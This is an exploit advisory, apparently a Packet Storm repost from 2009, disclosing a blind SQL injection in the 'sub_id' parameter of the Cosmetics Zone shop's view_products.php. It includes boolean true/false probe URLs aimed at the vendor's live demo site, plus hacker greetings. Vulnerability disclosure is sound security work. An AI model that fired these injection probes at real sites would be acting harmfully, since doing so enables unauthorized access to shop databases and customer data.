Cosmetics Zone suffers from a remote blind SQL injection vulnerability in view_products.php.
6df3f0628264641eeb879dae8555e2e94085cf17c72e227208c389ecf45f8d17[x]========================================================================================================================================[x]
| AntiSecurity[dot]org |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Title : Cosmetics Zone view_products.php?cat_id= blind sql Vulnerabilities |
| Software : Cosmetics Zone |
| Vendor : http://www.vastal.com/ |
| Demo : http://www.vastal.com/cosmetics_zone |
| Price : $299.99 |
| Date : 23 September 2009 ( Indonesia ) |
| Author : OoN_Boy |
| Contact : oon.boy9@gmail.com |
| Web : http://oonboy.info |
| Blog : http://oonboy.blogspot.com |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Description : Cosmetics Zone allow you to run a successful cosmetics shop by using the Cosmetics Zone product. We have provided |
| the following features for the cosmetics zone product. Browse By Categories, Search, Integrated it with Paypal, |
| Multiple Color Attribute for products having different colors, Compatible with paypal IPN, Multiple Language and |
| many more. Please see the demo site for more details, and feel free to contact us at any time for any inquiries or|
| for setting up a site like this |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/[path]/view_products.php?cat_id=5&sub_id=[sql] |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : http://www.vastal.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True |
| http://www.vastal.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id |
| h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338 |
[x]========================================================================================================================================[x]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed